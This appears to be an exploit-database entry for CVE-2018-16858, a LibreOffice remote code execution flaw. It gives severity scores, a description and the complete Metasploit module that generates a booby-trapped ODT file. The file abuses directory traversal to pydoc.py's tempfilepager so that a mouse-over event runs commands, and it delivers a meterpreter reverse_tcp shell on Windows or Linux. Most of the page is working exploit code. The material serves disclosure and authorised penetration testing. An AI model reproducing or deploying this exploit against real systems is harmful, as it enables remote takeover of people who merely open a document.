LibreOffice Macro Code Execution

2019-04-1219:01:29

Alex Inführ, Shelby Pace

www.rapid7.com

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.964 High

EPSS

Percentile

99.5%

JSON

LibreOffice comes bundled with sample macros written in Python and allows the ability to bind program events to them. A macro can be tied to a program event by including the script that contains the macro and the function name to be executed. Additionally, a directory traversal vulnerability exists in the component that references the Python script to be executed. This allows a program event to execute functions from Python scripts relative to the path of the samples macros folder. The pydoc.py script included with LibreOffice contains the tempfilepager function that passes arguments to os.system, allowing RCE. This module generates an ODT file with a mouse over event that when triggered, will execute arbitrary code.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Powershell
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'LibreOffice Macro Code Execution',
      'Description'    => %q{
        LibreOffice comes bundled with sample macros written in Python and
        allows the ability to bind program events to them. A macro can be tied
        to a program event by including the script that contains the macro and
        the function name to be executed. Additionally, a directory traversal
        vulnerability exists in the component that references the Python script
        to be executed. This allows a program event to execute functions from Python
        scripts relative to the path of the samples macros folder. The pydoc.py script
        included with LibreOffice contains the tempfilepager function that passes
        arguments to os.system, allowing RCE.

        This module generates an ODT file with a mouse over event that
        when triggered, will execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
      [
        'Alex Inführ', # Vulnerability discovery and PoC
        'Shelby Pace'  # Metasploit Module
      ],
      'References'     =>
        [
          [ 'CVE', '2018-16858' ],
          [ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]
        ],
      'Platform'       => [ 'win', 'linux' ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'Targets'        =>
        [
          [
            'Windows',
            {
              'Platform'        =>  'win',
              'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
              'Payload'         =>  'windows/meterpreter/reverse_tcp',
              'DefaultOptions'  =>  { 'PrependMigrate'  =>  true }
            }
          ],
          [
            'Linux',
            {
              'Platform'        =>  'linux',
              'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
              'Payload'         =>  'linux/x86/meterpreter/reverse_tcp',
              'DefaultOptions'  =>  { 'PrependFork' =>  true },
              'CmdStagerFlavor' =>  'printf',
            }
          ]
        ],
      'DisclosureDate'  =>  "2018-10-18",
      'DefaultTarget'   =>  0
    ))

    register_options(
    [
      OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])
    ])
  end

  def gen_windows_cmd
    opts =
    {
      :remove_comspec       =>  true,
      :method               =>  'reflection',
      :encode_final_payload =>  true
    }
    @cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)
    @cmd << ' &amp;&amp; echo'
  end

  def gen_linux_cmd
    @cmd = generate_cmdstager.first
    @cmd << ' &amp;&amp; echo'
  end

  def gen_file(path)
    text_content = Rex::Text.rand_text_alpha(10..15)

    # file from Alex Inführ's PoC post referenced above
    fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))
    libre_file = ERB.new(fodt_file).result(binding())
    libre_file
  rescue Errno::ENOENT
    fail_with(Failure::NotFound, 'Cannot find template file')
  end

  def exploit
    path = '../../../program/python-core-3.5.5/lib/pydoc.py'
    if datastore['TARGET'] == 0
      gen_windows_cmd
    elsif datastore['TARGET'] == 1
      gen_linux_cmd
    else
      fail_with(Failure::BadConfig, 'A formal target was not chosen.')
    end
    fodt_file = gen_file(path)

    file_create(fodt_file)
  end
end